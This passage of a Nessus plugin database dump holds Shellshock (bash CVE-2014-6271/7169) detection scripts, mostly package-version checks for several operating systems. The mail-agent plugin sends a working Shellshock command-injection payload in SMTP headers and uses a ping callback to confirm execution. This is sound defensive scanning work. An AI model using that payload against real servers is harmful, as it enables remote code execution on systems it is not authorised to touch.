Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-03-26T00:00:00", "type": "nessus", "title": "Debian DLA-63-1 : bash security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bash", "p-cpe:/a:debian:debian_linux:bash-builtins", "p-cpe:/a:debian:debian_linux:bash-doc", "p-cpe:/a:debian:debian_linux:bash-static", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-63.NASL", "href": "https://www.tenable.com/plugins/nessus/82208", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-63-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82208);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Debian DLA-63-1 : bash security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271\nreleased in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169). 
With this update prefix and\nsuffix for environment variable names which contain shell functions\nare added as hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.debian.org/debian-lts-announce/2014/09/msg00020.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/squeeze-lts/bash\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash-builtins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian 
Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"bash\", reference:\"4.1-3+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bash-builtins\", reference:\"4.1-3+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bash-doc\", reference:\"4.1-3+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bash-static\", reference:\"4.1-3+deb6u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:32", "description": "This build should fix CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Fedora 20 : bash-4.2.48-2.fc20 (2014-11527) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-11527.NASL", "href": "https://www.tenable.com/plugins/nessus/77941", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11527.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77941);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"FEDORA\", value:\"2014-11527\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Fedora 20 : bash-4.2.48-2.fc20 (2014-11527) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This build should fix CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1146319\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138687.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9e5e2549\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n 
script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"bash-4.2.48-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:57:45", "description": "The remote host appears to be running a mail transfer or mail delivery agent such as Courier, Exim, Postfix, or Procmail. Many of these agents can be configured to run utility scripts for a diverse number of tasks including filtering, sorting, and delivering mail. 
These scripts may create exploitable conditions, making the agent vulnerable to remote code execution via Shellshock.\n\nA negative result from this plugin does not prove conclusively that the remote system is not affected by Shellshock, only that the mail agent running on the system is not configured in such a way as to allow remote execution via Shellshock.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-28T00:00:00", "type": "nessus", "title": "Mail Transfer Agent and Mail Delivery Agent Remote Command Execution via Shellshock", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "SHELLSHOCK_MAIL_AGENTS.NASL", "href": "https://www.tenable.com/plugins/nessus/78701", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78701);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34896\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Mail Transfer Agent and Mail Delivery Agent Remote Command Execution via Shellshock\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a mail agent installed that allows remote command\nexecution via Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running a mail transfer or mail delivery\nagent such as Courier, Exim, Postfix, or Procmail. 
Many of these\nagents can be configured to run utility scripts for a diverse number\nof tasks including filtering, sorting, and delivering mail. These\nscripts may create the conditions that are exploitable, making the\nagent vulnerable to remote code execution via Shellshock.\n\nA negative result from this plugin does not prove conclusively that\nthe remote system is not affected by Shellshock, only that the mail\nagent running on the system is not configured in such a way to allow\nremote execution via Shellshock.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced Bash patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2014/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nport = get_service(svc: \"smtp\", default: 25, exit_on_fail: 1);\n\n# Open a connection.\nsoc = smtp_open(port:port, helo:this_host_name());\nif (!soc) audit(AUDIT_SVC_FAIL,\"SMTP\",port);\n\n# The data headers we want to try this attack on\nheaders = make_list(\n \"To:\",\n \"References:\",\n \"Cc:\",\n \"Bcc:\",\n \"From:\",\n \"Subject:\",\n \"Date:\",\n \"Message-ID:\",\n \"Comments:\",\n \"Keywords:\",\n \"Resent-Date:\",\n \"Resent-From:\",\n \"Resent-Sender:\"\n);\n\n#########################################################################################\n# Build header/data attacks\nptrn = rand_str(length:10);\ndata = \"\";\nid = 0;\nforeach head (headers)\n{\n hkey = hexstr(mkbyte(id));\n data += head+\"() { :;}; /bin/ping -p \"+hkey+hexstr(ptrn)+\" -c 3 \"+this_host_name()+'\\n';\n id += 1;\n}\nptrn = hexstr(ptrn);\n\nsend(socket:soc,data:'MAIL FROM: <>\\r\\n');\ns = smtp_recv_line(socket:soc);\nif (!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\n\nsend(socket:soc,data:'RCPT TO: <nobody>\\r\\n');\ns = smtp_recv_line(socket:soc);\nif (!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n 
close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\n#########################################################################################\n# Send attack data\nsend(socket:soc,data:'DATA\\r\\n');\ns = smtp_recv_line(socket:soc);\nif (!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\n\n# See if we get a response\nfilter = string(\"icmp and icmp[0] = 8 and src host \", get_host_ip());\ns = send_capture(socket:soc,data:data+'\\r\\n.\\r\\n',pcap_filter:filter);\ns = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\nclose(soc);\n\n# No response, meaning we didn't get in\nif (isnull(s) || ptrn >!< s) audit(AUDIT_LISTEN_NOT_VULN,\"Mail Agent\",port);\n\n# Figure out what let us in\nhkey = eregmatch(pattern:\"(\\d\\d)\"+ptrn,string:s);\n\n# Should never happen\nif (empty_or_null(hkey)) exit(1,\"Could not match pattern to response.\");\n\nhkey = int(getbyte(blob:hex2raw(s:hkey[1]),pos:0));\n\n# Should never happen\nif (hkey > max_index(headers)) exit(1, \"Strange header key in response.\");\n\nheader = headers[hkey];\nif (header == \"\")\n header = \"text contents\";\nelse\n header = \"'\"+str_replace(string:header, find:\":\", replace:\"\")+\"' header\";\n\nif (report_verbosity > 0)\n{\n report = 'The '+tolower(header)+' of the message was used to execute a remote command.';\n security_hole(port:port,extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:57:20", "description": "SunOS 5.9: bash patch.\nDate this patch was last updated by Sun : Sep/30/14", "cvss3": {"score": null, "vector": null}, "published": "2014-10-09T00:00:00", "type": "nessus", "title": "Solaris 9 (sparc) : 149079-03", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_149079.NASL", "href": 
"https://www.tenable.com/plugins/nessus/78112", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78112);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Solaris 9 (sparc) : 149079-03\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 149079-03\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.9: bash patch.\nDate this patch was last updated by Sun : Sep/30/14\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149079-03\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149079-01\");\n script_set_attribute(attribute:\"solution\", value:\n\"You 
should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\n\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"149079-03\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", 
patch:\"149079-03\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:49", "description": "Chet Ramey reports :\n\nUnder certain circumstances, bash will execute user code while processing the environment for exported function definitions.\n\nThe original fix released for CVE-2014-6271 was not adequate. A similar vulnerability was discovered and tagged as CVE-2014-7169.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "FreeBSD : bash -- remote code execution vulnerability (71ad81da-4414-11e4-a33e-3c970e169bc2) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:bash", "p-cpe:/a:freebsd:freebsd:bash-static", "p-cpe:/a:freebsd:freebsd:linux_base-c6", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_71AD81DA441411E4A33E3C970E169BC2.NASL", "href": "https://www.tenable.com/plugins/nessus/77836", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77836);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"FreeBSD : bash -- remote code execution vulnerability (71ad81da-4414-11e4-a33e-3c970e169bc2) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Chet Ramey reports :\n\nUnder certain circumstances, bash will execute user code while\nprocessing the environment for exported function 
definitions.\n\nThe original fix released for CVE-2014-6271 was not adequate. A\nsimilar vulnerability was discovered and tagged as CVE-2014-7169.\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.gnu.org/archive/html/bug-bash/2014-09/msg00081.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/oss-sec/2014/q3/690\");\n # https://vuxml.freebsd.org/freebsd/71ad81da-4414-11e4-a33e-3c970e169bc2.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1ec4245a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:freebsd:freebsd:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bash-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux_base-c6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"bash>3.0<=3.0.17\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>3.1<=3.1.18\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>3.2<=3.2.52\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>4.0<=4.0.39\")) 